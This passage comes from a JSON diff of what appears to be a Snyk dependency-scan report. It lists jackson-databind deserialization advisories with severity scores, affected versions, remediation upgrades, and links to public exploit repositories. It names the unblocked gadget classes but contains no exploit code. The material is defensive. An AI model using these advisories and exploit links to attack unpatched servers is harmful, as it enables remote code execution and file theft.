"3.0", + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n", + "epssDetails": { + "percentile": "0.87218", + "probability": "0.01539", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12814" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cmfg-87vq-g5g4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-19T15:28:46.421239Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-06-19T14:34:16Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-19T14:34:16Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.077144Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.7.9.6" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "College of software Nankai University" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when the feature Polymorphic Type Handling (PTH) is enabled." + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html", + "title": "Debian Security Announcement" + }, + { + "url": "https://github.com/jas502n/CVE-2019-12384", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "title": "Github Fix" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2334", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Jackson CVEs Don't Panic - Blog" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x", + "title": "Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:45.683422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.97607", + "probability": "0.53288", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12384" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mph4-vhrx-mv67" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-25T10:06:54.889582Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-28T10:27:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-25T10:26:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.734463Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.7.9.6" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.033731Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.83638", + "probability": "0.00984", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14379" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-07-29T14:55:33.030000Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.502907Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.7.9.6" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2449", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.808389Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n", + "epssDetails": { + "percentile": "0.71702", + "probability": "0.00342", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16335" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-85cw-hj65-qqv9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:06.837179Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:30:24Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:30:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.931793Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "iSafeBlue" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/LeadroyaL/cve-2019-14540-exploit", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2410", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.892322Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called 